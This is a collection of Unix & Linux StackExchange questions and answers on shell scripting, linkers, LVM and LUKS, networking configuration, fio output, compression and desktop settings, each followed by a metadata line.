Has anyone used the gold linker before? To link a fairly large project, I had to use this as opposed to the GNU ld , which threw up a few errors and failed to link. How is the gold linker able to link large projects where ld fails? Is there some kind of memory trickery somewhere?
The gold linker was designed as an ELF-specific linker, with the intention of producing a more maintainable and faster linker than BFD ld (the “traditional” GNU binutils linker). As a side-effect, it is indeed able to link very large programs using less memory than BFD ld , presumably because there are fewer layers of abstraction to deal with, and because the linker’s data structures map more directly to the ELF format. I’m not sure there’s much documentation which specifically addresses the design differences between the two linkers, and their effect on memory use. There is a very interesting series of articles on linkers by Ian Lance Taylor, the author of the various GNU linkers, which explains many of the design decisions leading up to gold . He writes that The linker I am now working, called gold, on will be my third. It is exclusively an ELF linker. Once again, the goal is speed, in this case being faster than my second linker. That linker has been significantly slowed down over the years by adding support for ELF and for shared libraries. This support was patched in rather than being designed in. (The second linker is BFD ld .)
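If you want to try gold on your own project, you usually don't invoke it directly; gcc and clang can select it for the link step, assuming the ld.gold binary (often packaged as binutils-gold) is installed. The program and object file names here are just placeholders:
$ gcc -fuse-ld=gold -o myprog main.o utils.o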
{ "score": 6, "source": [ "https://unix.stackexchange.com/questions/545699", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/345639/" ] }
545,894
On my CentOS 7.7.1908, the manpage for boot (describing the system boot process) is not installed. How to find which package provides it? yum whatprovides /usr/share/man/man7/boot.7.gz returns no results. The bootup manpage is installed from the base repo and references the manpage boot(7) in the SEE ALSO section.
The boot(7) manpage is provided by the man-pages project. In CentOS, this is packaged as man-pages , but a few man pages which are considered irrelevant for CentOS are excluded, including boot(7) . boot(7) is considered irrelevant because it describes the System V-style boot process (using inittab and boot scripts). This does mean that CentOS (and RHEL, and Fedora) should patch out the reference to the man page...
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/545894", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/34039/" ] }
545,909
I have a file named Build.number with the content value 012 , which I need to increment by +1. So, I tried this:
BN=$(cat Build.number)
BN=$(($BN+1))
echo $BN >Build.number
but here I am getting the value 11 when I am expecting 013 . Can anyone help me?
The leading 0 causes Bash to interpret the value as an octal value ; 012 octal is 10 decimal, so you get 11. To force the use of decimal, add 10# (as long as the number has no leading sign):
BN=10#$(cat Build.number)
echo $((++BN)) > Build.number
To print the number using at least three digits, use printf :
printf "%.3d\n" $((++BN)) > Build.number
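You can see the octal interpretation directly in arithmetic expansion, independent of any file:
$ echo $((012))
10
$ echo $((10#012))
12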
{ "score": 6, "source": [ "https://unix.stackexchange.com/questions/545909", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/376375/" ] }
545,914
I have the following input file
H1
C1
C2
C3
H2
C4
...
I would like to obtain the following output format, only with the characters and not the numbers
H
C
C
C
H
C
...
You can strip the digits with tr or sed :
tr -d '0-9' < file
or
sed 's/[0-9]//g' file
Either one turns H1 , C1 , C2 , ... into H , C , C , ... while keeping one entry per line.
{ "score": 6, "source": [ "https://unix.stackexchange.com/questions/545914", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/298739/" ] }
545,922
I'd like to have a very simple condition that will only execute if the command fails. In this example it's a conditional based on the SUCCESS of the command:
if command ; then
    echo "Command succeeded"
fi
I'd like the opposite - how can I do this? Is there an elegant way besides doing a comparison on $? ? I do not want to use the || operator - it does not semantically convey (in my opinion) the desired functionality, as in the case of command || echo "command failed" .
Negate the command's exit status :
if ! command ; then
    echo "Command failed"
fi
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/545922", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/124109/" ] }
545,958
I am running kali linux on a virtual machine (VM). I started the machine today and noticed that the interface eth0 is missing. So I tried ifup eth0 to start it, but got output: unknown interface eth0 . But if I execute ethtool eth0 then I get this output: Settings for eth0: Supported ports: [ TP ] Supported link modes: 10baseT/Half 10baseT/Full 100baseT/Half 100baseT/Full 1000baseT/Full Supported pause frame use: No Supports auto-negotiation: Yes Supported FEC modes: Not reported Advertised link modes: 10baseT/Half 10baseT/Full 100baseT/Half 100baseT/Full 1000baseT/Full Advertised pause frame use: No Advertised auto-negotiation: Yes Advertised FEC modes: Not reported Speed: 1000Mb/s Duplex: Full Port: Twisted Pair PHYAD: 0 Transceiver: internal Auto-negotiation: on MDI-X: Unknown (auto) Supports Wake-on: d Wake-on: d Current message level: 0x00000007 (7) drv probe link Link detected: no
The reason for this error is that here, eth0 means two different things: either the actual interface name, as seen by the kernel, iproute2 tools, ethtool , dhclient , etc., which does exist, or the interface configuration in the ifupdown tools, pointing to the actual interface name. Here, if eth0 was never defined in the configuration, then it's not known by ifup : that's the error message. An easy way to reproduce this error:
# ip link add name veth5 type veth peer name veth6
# ethtool veth5
Settings for veth5:
        Supported ports: [ ]
[...]
        Link detected: no
# ifup veth5
ifup: unknown interface veth5
So the interface is not missing; the ifupdown tool has just not been configured to use it. For your case, you could add at the end of /etc/network/interfaces (or in a separate file, for example /etc/network/interfaces.d/eth0 if the interfaces file includes the interfaces.d directory in its config) these two lines:
auto eth0
iface eth0 inet dhcp
to have the ifupdown tools and so the ifup command know about it and configure it with DHCP at boot. I have no idea why this wasn't in place before. In my previous fake example where I likewise added veth5 's definition (on Debian 9):
# ifup -a
Internet Systems Consortium DHCP Client 4.3.5
Copyright 2004-2016 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Listening on LPF/veth5/1e:96:59:c3:e4:0c
Sending on   LPF/veth5/1e:96:59:c3:e4:0c
Sending on   Socket/fallback
DHCPDISCOVER on veth5 to 255.255.255.255 port 67 interval 8
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/545958", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/124191/" ] }
545,984
I am trying to run this command in Linux: tar zcvf ABCD.tar.gz -T Files.txt and I am getting the following error: Error: tar: Removing leading `/' from member names Based on Find /SED to convert absolute path to relative path within a single line tar statement for crontab , I tried this command: tar -C / -zcvf ABCD.tar.gz -T Files.txt but I am still getting the same error message.
In GNU tar, if you want to keep the slashes in front of the file names, the option you need is: -P, --absolute-names Don't strip leading slashes from file names when creating archives. So, tar zcvf ABCD.tar.gz -P -T Files.txt . The slashes would probably be removed when the archive is extracted, unless of course you use -P there, too. If, on the other hand, you want to remove the slashes, but without tar complaining, you'd need to do something like sed s,^/,, files.txt | tar czf foo.tar.gz -C / -T - .
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/545984", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/353888/" ] }
546,083
some name;another thing; random; value value value value value
I'm trying to replace the spaces that occur after the random; using sed. It's important to keep the spaces that are in some name , for example. This replaces all spaces with a comma:
sed -e 's/ /,/g'
How could I match an expression like *;*;*; and use sed on the rest of the line to replace the spaces with commas? Thanks
Using gsub() in awk on the last ; -delimited field:
$ awk -F ';' 'BEGIN { OFS=FS } { gsub(" ", ",", $NF); print }' file
some name;another thing; random;,value,value,value,value,value
Using sed and assuming we'd like to replace all spaces after the last ; with commas:
$ sed 'h;s/.*;//;y/ /,/;x;s/;[^;]*$//;G;s/\n/;/' file
some name;another thing; random;,value,value,value,value,value
Annotated sed script:
h           ; # Duplicate line into hold space
s/.*;//     ; # Delete up to the last ;
y/ /,/      ; # Change space to comma in remaining data
x           ; # Swap pattern and hold space
s/;[^;]*$// ; # Delete from the last ;
G           ; # Append hold space delimited by newline
s/\n/;/     ; # Replace the embedded newline with ;
            ; # (implicit print)
The "hold space" is a separate storage buffer that sed provides. The "pattern space" is the buffer into which the data is read from the input and to which modifications may be applied.
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/546083", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/222765/" ] }
546,155
Recently installed Debian 10 "Buster" on an old computer here and now it's showing the $ date output with 1 hour less. How can the system time be synchronized with NTP for GMT-3, the America/Recife timezone?
To verify the timezone of your system (mine is Europe/Berlin), run
$ cat /etc/timezone
Europe/Berlin
If it is wrong, run sudo dpkg-reconfigure tzdata and choose America , then Recife and check if the printed local time is now correct. You can also print the UTC date with date -u which should be your local time +3 hours.
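On Debian 10 the default init is systemd, so both steps can also be done with timedatectl , which additionally covers the NTP part of the question by enabling systemd-timesyncd:
$ sudo timedatectl set-timezone America/Recife
$ sudo timedatectl set-ntp true
$ timedatectl
The last command should then report the zone as America/Recife (-03) and "System clock synchronized: yes" once a time server has been reached.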
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/546155", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/153059/" ] }
546,306
I'm having problems unlocking a luks-encrypted disk with KDE dolphin, in a system with manjaro. The issue is not critical. It can be solved by rebooting, but sometimes it is not convenient to do so, and I find that it might be useful to understand why this problem appears in the first place. So the first time I unlock the device after a reboot everything is fine. If I unmount the system, next times will also be ok. The problem is that sometimes, I connect the device, and after entering the password I get the following error: An error occurred while accessing 'Home', the system responded: The requested operation has failed: Error unlocking /dev/sdxy: Failed to activate device: File exists But this file cannot be seen with df -h , and it is not mounted via /etc/fstab , it is always mounted and unlocked when connected. The command fuser won't show anything relevant, and lsof only returns: lsof: WARNING: can't stat() fuse.gvfsd-fuse file system /run/user/1000/gvfs Output information may be incomplete.lsof: WARNING: can't stat() fuse file system /run/user/1000/doc Output information may be incomplete. In fact, I see some processes using this folder ( ps aux | grep 1000 ), but do not know whether this actually helps to solve the problem. 1779 ? Sl 0:03 /usr/lib/gvfsd-fuse /run/user/1000/gvfs -f -o big_writes1847 ? S 0:03 file.so [kdeinit5] file local:/run/user/1000/klaunchermRxLKs.1.slave-socket local:/run/user/1000/kded5IKggHu.1.slave-socket23434 ? S 0:00 file.so [kdeinit5] file local:/run/user/1000/klauncherDwiyfV.1.slave-socket local:/run/user/1000/dolphinaVwzoi.58.slave-socket I suspect killing these processes might help, but do not know if it's safe (cannot risk to do so right know, not without knowing). Any ideas? EDIT : Output for dmsetup info and dmsetup table : dmsetup info Name: luks-92bde790-5ca6-441b-bad3-5c3163292c8bState: ACTIVERead Ahead: 256Tables present: LIVEOpen count: 0Event number: 0Major, minor: 254, 1Number of targets: 1UUID: CRYPT-LUKS1-92bde7905ca6441bbad35c3163292c8b-luks-92bde790-5ca6-441b-bad3-5c3163292c8bName: luks-1f919383-2d4a-44e2-b28e-21bffd11dd6cState: ACTIVERead Ahead: 256Tables present: LIVEOpen count: 1Event number: 0Major, minor: 254, 0Number of targets: 1UUID: CRYPT-LUKS1-1f9193832d4a44e2b28e21bffd11dd6c-luks-1f919383-2d4a-44e2-b28e-21bffd11dd6c dmsetup table luks-92bde790-5ca6-441b-bad3-5c3163292c8b: 0 4294963200 crypt aes-xts-plain64 0000000000000000000000000000000000000000000000000000000000000000 0 8:33 4096luks-1f919383-2d4a-44e2-b28e-21bffd11dd6c: 0 3906401473 crypt aes-xts-plain64 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0 8:2 4096
If, after looking at the output of dmsetup ls you find that you have stale devices you can remove them with dmsetup remove – ideally after carefully verifying that the device is indeed not in use. I had the same problem and after doing so I was able to unlock and mount my encrypted USB hard disk again:
# dmsetup ls --tree
luks-f53274db-3ede-4a27-9aa6-2525d9305f94 (254:5)
 `- (8:34)
# ls -l /dev/mapper/
total 0
crw------- 1 root root 10, 236 Nov 24 15:22 control
lrwxrwxrwx 1 root root       7 Nov 27 09:42 luks-f53274db-3ede-4a27-9aa6-2525d9305f94 -> ../dm-5
# dmsetup remove /dev/dm-5
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/546306", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/188292/" ] }
546,307
fio output shows two bandwidth numbers at two places (for both read and write). What does these two numbers indicate? Which one should be considered for throughput test and for what the other one should be considered? 1 {JOB}:{1}_{4k}_{5}: (g=0): rw=randrw, bs=(R) 4096B-4096B, (W) 4096B-4096B, (T) 4096B-4096B, ioengine=libaio, iodep th=32 2 ... 3 fio-3.1 4 Starting 16 threads 5 6 {JOB}:{1}_{4k}_{5}: (groupid=0, jobs=16): err= 0: pid=143919: Thu Oct 10 18:35:14 2019 7 read: IOPS=50.1k, BW=196MiB/s (205MB/s)(34.4GiB/180002msec) 8 slat (nsec): min=1210, max=191233, avg=3335.76, stdev=1810.98 9 clat (usec): min=166, max=16660, avg=695.21, stdev=319.44 10 lat (usec): min=169, max=16662, avg=698.62, stdev=319.39 11 clat percentiles (usec): 12 | 1.00th=[ 338], 5.00th=[ 396], 10.00th=[ 433], 20.00th=[ 482], 13 | 30.00th=[ 515], 40.00th=[ 537], 50.00th=[ 570], 60.00th=[ 685], 14 | 70.00th=[ 832], 80.00th=[ 914], 90.00th=[ 1012], 95.00th=[ 1188], 15 | 99.00th=[ 1532], 99.50th=[ 2057], 99.90th=[ 3490], 99.95th=[ 3884], 16 | 99.99th=[ 5997] 17 bw ( KiB/s): min= 5883, max=16873, per=6.26%, avg=12545.77, stdev=3041.02, samples=5760 18 iops : min= 1470, max= 4218, avg=3136.15, stdev=760.26, samples=5760 19 write: IOPS=952k, BW=3720MiB/s (3901MB/s)(654GiB/180002msec) 20 slat (nsec): min=1192, max=927014, avg=3640.66, stdev=1926.60 21 clat (usec): min=98, max=10023, avg=496.01, stdev=170.79 22 lat (usec): min=100, max=10025, avg=499.72, stdev=170.69 23 clat percentiles (usec): 24 | 1.00th=[ 273], 5.00th=[ 326], 10.00th=[ 355], 20.00th=[ 388], 25 | 30.00th=[ 420], 40.00th=[ 445], 50.00th=[ 457], 60.00th=[ 474], 26 | 70.00th=[ 486], 80.00th=[ 510], 90.00th=[ 865], 95.00th=[ 930], 27 | 99.00th=[ 1004], 99.50th=[ 1029], 99.90th=[ 1188], 99.95th=[ 1287], 28 | 99.99th=[ 1467] 29 bw ( KiB/s): min=121170, max=307136, per=6.26%, avg=238474.82, stdev=57541.32, samples=5760 30 iops : min=30292, max=76784, avg=59618.41, stdev=14385.36, samples=5760 31 lat (usec) : 100=0.01%, 250=0.25%, 500=73.65%, 750=12.84%, 1000=11.71% 32 lat (msec) : 2=1.52%, 4=0.02%, 10=0.01%, 20=0.01% 33 cpu : usr=6.39%, sys=33.77%, ctx=40608436, majf=0, minf=11562 34 IO depths : 1=0.1%, 2=0.1%, 4=0.1%, 8=0.1%, 16=0.1%, 32=100.0%, >=64=0.0% 35 submit : 0=0.0%, 4=100.0%, 8=0.0%, 16=0.0%, 32=0.0%, 64=0.0%, >=64=0.0% 36 complete : 0=0.0%, 4=100.0%, 8=0.0%, 16=0.0%, 32=0.1%, 64=0.0%, >=64=0.0% 37 issued rwt: total=9019565,171442027,0, short=0,0,0, dropped=0,0,0 38 latency : target=0, window=0, percentile=100.00%, depth=32 39 40 Run status group 0 (all jobs): 41 READ: bw=196MiB/s (205MB/s), 196MiB/s-196MiB/s (205MB/s-205MB/s), io=34.4GiB (36.9GB), run=180002-180002msec 42 WRITE: bw=3720MiB/s (3901MB/s), 3720MiB/s-3720MiB/s (3901MB/s-3901MB/s), io=654GiB (702GB), run=180002-180002mse c 43 44 Disk stats (read/write): 45 nvme1n1: ios=9013394/171326957, merge=0/0, ticks=6201303/82738341, in_queue=103287914, util=100.00% For example, for read, following are the relevant lines 7: read: IOPS=50.1k, BW=196MiB/s (205MB/s)(34.4GiB/180002msec)17: bw ( KiB/s): min= 5883, max=16873, per=6.26%, avg=12545.77, stdev=3041.02, samples=576041: READ: bw=196MiB/s (205MB/s), 196MiB/s-196MiB/s (205MB/s-205MB/s), io=34.4GiB (36.9GB), run=180002-180002msec What does the "BW" in line 7 tells and what does the "bw" in line 17 tells? How are they different? For throughput test, which one should be considered?
Both numbers are bandwidth, just at different levels of aggregation. The BW=196MiB/s on line 7 (repeated in the Run status group summary on line 41) is the aggregate throughput of the whole group: the total bytes read by all 16 threads divided by the runtime. The lower-case bw ( KiB/s): on line 17 is a per-job statistic built from periodic bandwidth samples: min, max, average and standard deviation of an individual job's bandwidth. You can sanity-check this from your own output: avg=12545.77 KiB/s times 16 jobs is roughly the 196 MiB/s aggregate, per=6.26% is about 1/16 (one job's share of the group total), and samples=5760 is 16 jobs times 360 samples over the 180-second run. For a throughput test, quote the aggregate number (line 7 / line 41); the per-job line is mainly useful for spotting imbalance or variance between the threads.
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/546307", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/376737/" ] }
546,465
I have a big bzip2 compressed file and I need to check its decompressed size without actually decompressing it (similar to gzip -l file.gz or xz -l file.xz ). How can this be done using bzip2 ?
Like mentioned in the comments and linked answer, the only reliable way is to decompress (in a pipe) and do a byte count.
$ bzcat file.bz2 | wc -c
1234
Alternatively find some tool that does it without the superfluous pipe (could be slightly more efficient):
$ 7z t file.bz2
[...]
Everything is Ok
Size: 1234
This also applies to gzip and other formats. Although gzip -l file.gz prints a size, it can be a wrong result. Once the file is past a certain size, you get stuff like:
$ gzip --list foobar.gz
         compressed        uncompressed  ratio uncompressed_name
           97894400            58835168 -66.4% foobar
$ gzip --list foobar.gz
         compressed        uncompressed  ratio uncompressed_name
         4796137936                   0   0.0% foobar
Or if the file was concatenated or simply not created correctly:
$ truncate -s 1234 foobar
$ gzip foobar
$ cat foobar.gz foobar.gz > barfoo.gz
$ gzip -l barfoo.gz
         compressed        uncompressed  ratio uncompressed_name
                 74                1234  96.0% barfoo
$ zcat barfoo.gz | wc -c
2468
The size does not match so this is not reliable in any way. Sometimes you can cheat, depending on what's inside the archive. For example if it's a compressed filesystem image, with a metadata header at the start, you could decompress just that header then read total filesystem size from it.
$ truncate -s 1234M foobar.img
$ mkfs.ext2 foobar.img
$ bzip2 foobar.img
$ bzcat foobar.img.bz2 | head -c 1M > header.img
$ tune2fs -l header.img
tune2fs 1.45.4 (23-Sep-2019)
Filesystem volume name:   <none>
Last mounted on:          <not available>
Filesystem UUID:          95b64880-c4a7-4bea-9b63-6fdcc86d0914
[...]
Block count:              315904
Block size:               4096
So by extracting a tiny part you learn that this is 315904 blocks of 4096 bytes, which comes out as 1234 MiB. There's no guarantee that would be the actual size of the compressed file (it could be larger or smaller) but assuming no weird stuff, it's more trustworthy than gzip -l in any case. Last but not least if those files are created by you in the first place, just record the size.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/546465", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/264975/" ] }
546,589
Recently installed Xfce along with Debian 10 "Buster", but I'm having trouble with user management actions, like changing the portrait picture, adding a user, removing a user or changing a password, in the graphical user interface; I only succeed on the command line. Isn't there a graphical user management tool by default, and if not, isn't there a package which provides one?
Except for the profile picture, what you want to do is normally done through the "Users and Groups" dialog. If for some reason it's unavailable through your GUI, it can be run from the command line with the command system-config-users . If the command's not found, you should be able to install it from your repo. As far as I know, no one's yet gotten around to adding a profile picture setting feature to "Users and Groups". To change the picture, make the picture a png image (other types may work as well), name it .face (with no further extension), and put it in your home directory (i.e. ~/ ). If the image is too large or not equal in height & width, Xfce shrinks the image as needed to fit. I'm not sure if there are any size limits on the image. To change the image on the login screen, you'll need to provide an image (with an ordinary name and extension) that's accessible by LightDM, and then set the User image in the LightDM GTK+ Greeter settings to that image. The image can be put in /home if your user home directory is encrypted, and the permissions may need to be set to make it readable by LightDM. You'll need to install lightdm-gtk-greeter-settings from your repo if the Greeter settings item isn't available in Xfce's Settings. I originally picked up info on changing the profile and login screen pictures from the video How to set an account image in XFCE , with relevant stuff really starting at about 1:20.
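For the ~/.face step, one way to produce a suitable square PNG is ImageMagick (the source file name here is only an example, and the png: prefix forces the output format since .face has no extension):
$ convert ~/Pictures/me.jpg -resize 128x128 "png:$HOME/.face"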
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/546589", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/376956/" ] }
546,596
I run a Fortran 77 program in the terminal with ./program and the program asks for the input and output file. What should I write to the terminal when I have the names of input and output files in a file - in two columns? I would like to run the program for all rows in the file with names. Or - how can I run the program with the input information passed like parameters? Or how can I write the name of the file directly in the script, instead of READ(*,'(A)') OUT ?
I made the following program file prog.f
      program test
      character IN*30,OUT*30,line*80
      PRINT *,'Input file '
      READ(*,'(A)') IN
      OPEN(1,FILE=IN,STATUS='OLD')
      PRINT *,'Output file?'
      READ(*,'(A)') OUT
      OPEN(2,FILE=OUT,STATUS='NEW',BLANK='ZERO')
      read (1,'(a80)') line
      write (2,*) "I read ", line
      end
compiled & linked it with
gfortran prog.f -o prog
I put a text string into an input file
echo "Hello World" > in
Then I sent the names of the input file in and output file out to the program
$ <<< 'in
out' ./prog
 Input file
 Output file?
and checked the output file
$ cat out
 I read Hello World
<<< works in bash . You may prefer piping from echo which is more portable,
$ rm out
rm: remove normal file 'out'? y
$ echo 'in
out' | ./prog
 Input file
 Output file?
$ cat out
 I read Hello World
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/546596", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/372341/" ] }
546,598
When I open the terminal a line Install package 'dpkg' to provide command 'dpkg'? [N/y] appears. Is there a way to track which program is trying to run this command? I am clueless why this appears in terminal. I am using Fedora 30 and zsh.
That prompt is produced by PackageKit's command-not-found handler, which Fedora installs by default: whenever the shell can't find a command, the handler offers to install a package that provides it. So something that runs when your terminal opens is trying to execute dpkg , which doesn't exist on Fedora. To track it down, search your shell startup files for it:
grep -n dpkg ~/.zshrc ~/.zprofile ~/.zshenv ~/.zlogin /etc/zshrc 2>/dev/null
or start zsh with tracing ( zsh -x ) and look at what executes right before the prompt appears. A common culprit is a shell plugin or theme that probes for Debian tools. If you just want the prompt gone, removing the PackageKit-command-not-found package disables the handler.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/546598", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/377017/" ] }
546,664
I'd like to echo all non-environment variables (all self-declared variables), in Bash 3.2.52. This command to print all variables gave me output I can't understand that seems to me to conflict with the set -x && clear -r mode I already work in. diff -U 1 <(set -o posix ; set |cut -d= -f1) <( exec bash -ic 'set -o posix ; set' | cut -d= -f1) | grep '^[-][^-]' | cut -d- -f2 | grep -vE '^(COLUMNS|HISTFILESIZE|HISTSIZE|LINES|PIPESTATUS)$' I need an echo or printf (or any other "simpler") operation to have such list. If possible in this version of Bash, how can this be achieved?
GNU Parallel includes env_parallel . Part of env_parallel lists all variables for the supported shells. For bash this code is:
_names_of_VARIABLES() {
    compgen -A variable
}
_bodies_of_VARIABLES() {
    typeset -p "$@"
}
So given all variables we need to figure out which ones are set by the user. We can do that by hardcoding all variables set by a given version of bash , but that would not be very future proof, because bash may set more variables in future versions (Is $BASH_MYVAR set by the user or by a future version of bash ?). So instead env_parallel asks you to define a clean environment, and run env_parallel --session in that. This will set $PARALLEL_IGNORED_NAMES by listing the names defined before (using the code above). When later run in an environment where the user has set variables, it is easy to take the difference between the clean environment and the current environment. env_parallel --session makes it possible to define a clean environment for every session, but if you prefer to have a reference environment that can be used across sessions, simply save the list of variables to a file. So:
# In clean environment
compgen -A variable > ~/.clean-env-vars
# In environment with user defined vars
compgen -A variable | grep -Fxvf ~/.clean-env-vars
For example:
#!/bin/bash
# In clean environment
compgen -A variable > ~/.clean-env-vars
myvar=4
yourvar=3
# In environment with user defined vars
compgen -A variable | grep -Fxvf ~/.clean-env-vars
# This prints:
# myvar
# yourvar
# PIPESTATUS (which is set when running a pipe)
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/546664", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/-1/" ] }
546,692
Usually we can use the up arrow key to get the previous command. But that does not always work; it can happen that you get the ASCII sequence instead (" ^[[A ..."). I also wonder: older keyboards did not have arrow keys, so how did this work in those days? Is or was there another way?
In emacs mode: Ctrl - P (previous); the other direction is Ctrl - N (next).
In vi mode: ESC (to go to command mode), then k for going up and j for going down.
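If you'd rather configure this yourself, readline also lets you bind keys in ~/.inputrc (this affects bash and other readline programs; here Ctrl-P/Ctrl-N additionally do prefix-matching history search):
"\C-p": history-search-backward
"\C-n": history-search-forward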
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/546692", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/9115/" ] }
546,695
I wrote a partition table manually during a system installation which contains an encrypted part, the /boot partition and an unpartitioned rest. Although I first created the partitions (manually each) and put them in one logical volume. The logical volume important is filled up with the volume group a (if it cannot be this way, please correct; if you know it must be this way, please remove this note). Afterwards, I encrypted the logical volume with LUKS and installed the system. partition table $ LC_ALL=C sudo lsblk[sudo] password for sj126:NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINTsda 8:0 0 931.5G 0 disk|-sda1 8:1 0 953M 0 part /boot|-sda2 8:2 0 1K 0 part|-sda3 8:3 0 16G 0 part [SWAP]|-sda4 8:4 0 100G 0 part|-sda5 8:5 0 7.5G 0 part| `-experiment-test 254:0 0 418.3G 0 lvm| `-experiment-test_crypt 254:1 0 418.3G 0 crypt /|-sda6 8:6 0 14G 0 part| `-experiment-test 254:0 0 418.3G 0 lvm| `-experiment-test_crypt 254:1 0 418.3G 0 crypt /|-sda7 8:7 0 372.5G 0 part| `-experiment-test 254:0 0 418.3G 0 lvm| `-experiment-test_crypt 254:1 0 418.3G 0 crypt /|-sda8 8:8 0 7G 0 part| `-experiment-test 254:0 0 418.3G 0 lvm| `-experiment-test_crypt 254:1 0 418.3G 0 crypt /|-sda9 8:9 0 7G 0 part| `-experiment-test 254:0 0 418.3G 0 lvm| `-experiment-test_crypt 254:1 0 418.3G 0 crypt /|-sda10 8:10 0 7G 0 part| `-experiment-test 254:0 0 418.3G 0 lvm| `-experiment-test_crypt 254:1 0 418.3G 0 crypt /|-sda11 8:11 0 2.3G 0 part| `-experiment-test 254:0 0 418.3G 0 lvm| `-experiment-test_crypt 254:1 0 418.3G 0 crypt /`-sda12 8:12 0 1.1G 0 part `-experiment-test 254:0 0 418.3G 0 lvm `-experiment-test_crypt 254:1 0 418.3G 0 crypt /$ LC_ALL=C sudo partitionmanagerQStandardPaths: XDG_RUNTIME_DIR not set, defaulting to '/tmp/runtime-root'Loaded backend plugin: "pmlibpartedbackendplugin""Using backend plugin: pmlibpartedbackendplugin (1)""Scanning devices...""Device found: [...]"blkid: unknown file system type "" on "/dev/sda2""Partition ‘/dev/sda2’ is not properly aligned (first sector: 1955838, modulo: 2046).""Scan finished." The point is that when browsing my dirs, only /boot on /dev/sda2 appears as a (separate) partition, the residual parts in / seem to be on the same partition. dev/sda{5,..12} should become partitions containing /home , e. g., stay in the same logical volume and should also be mounted there. EDIT: The following is my partition table (updated). The partitions 3 and 4 are the beginning of a workaround and may be ignored for now. The only things left out are the disk label and the disk identifier. 
$ LC_ALL=C sudo fdisk -l /dev/sdaDisk /dev/sda: 931.5 GiB, 1000204886016 bytes, 1953525168 sectorsDisk model: [...]Units: sectors of 1 * 512 = 512 bytesSector size (logical/physical): 512 bytes / 4096 bytesI/O size (minimum/optimal): 4096 bytes / 4096 bytesDisklabel type: dosDisk identifier: [...]Device Boot Start End Sectors Size Id Type/dev/sda1 * 2048 1953791 1951744 953M 83 Linux/dev/sda2 1955838 879298559 877342722 418.4G 5 Extended/dev/sda3 879300608 912855039 33554432 16G 82 Linux swap / Solaris/dev/sda4 * 912857088 1122572287 209715200 100G 83 Linux/dev/sda5 1955840 17577983 15622144 7.5G 8e Linux LVM/dev/sda6 17580032 46874623 29294592 14G 8e Linux LVM/dev/sda7 46876672 828125183 781248512 372.5G 8e Linux LVM/dev/sda8 828127232 842774527 14647296 7G 8e Linux LVM/dev/sda9 842776576 857423871 14647296 7G 8e Linux LVM/dev/sda10 857425920 872073215 14647296 7G 8e Linux LVM/dev/sda11 872075264 876955647 4880384 2.3G 8e Linux LVM/dev/sda12 876957696 879298559 2340864 1.1G 8e Linux LVMPartition 2 does not start on physical sector boundary.Partition table entries are not in disk order.$ LC_ALL=C sudo lvs LV VG Attr LSize Pool Origin Data% Meta% Move Log Cpy%Sync Convert test experiment -wi-ao---- <418.32g$ LC_ALL=C sudo pvs PV VG Fmt Attr PSize PFree /dev/sda10 experiment lvm2 a-- 6.98g 0 /dev/sda11 experiment lvm2 a-- 2.32g 0 /dev/sda12 experiment lvm2 a-- 1.11g 0 /dev/sda5 experiment lvm2 a-- <7.45g 0 /dev/sda6 experiment lvm2 a-- 13.96g 0 /dev/sda7 experiment lvm2 a-- <372.53g 0 /dev/sda8 experiment lvm2 a-- 6.98g 0 /dev/sda9 experiment lvm2 a-- 6.98g 0
What you're seeing is normal LVM behaviour rather than a bug. The moment sda5 through sda12 were added as physical volumes to the experiment volume group, their individual partition boundaries stopped mattering: a volume group is just one pool of extents. What gets a filesystem and a mount point is a logical volume, and you created exactly one ( test ), put LUKS on it and mounted the whole thing as / , so everything except /boot necessarily lives on that single filesystem. If you want /home (or anything else) on its own filesystem, create separate logical volumes, e.g. lvcreate -L 50G -n home experiment , then make a filesystem on it and mount it at /home . Note two things from your own output, though: pvs shows PFree 0 , i.e. the whole VG is already allocated to test , so you would first have to shrink that LV (and the filesystem and LUKS container inside it) or redo the layout; and splitting the disk into eight small PVs buys you nothing here, since a single PV would behave identically. The more common encrypted layout is one big LUKS container with LVM inside it, carved into root, home, swap, etc.
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/546695", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/154403/" ] }
546,699
I can't seem to figure out how to enable protected content in Chromium, even though the option is enabled in settings. URL I try to get working: https://open.spotify.com/browse What I have tried: change of userAgent change of userAgent + using widevine library from a Chromebook image ( link ) After executing option 2 with the below userAgent, the website does not refer me to their "this browser does not work, try our app" page. Instead, it presents an error: "Spotify won't work if you block protected content, have an incompatible browser, or are using incognito browsing mode" Chromium version 72.0.3626.121
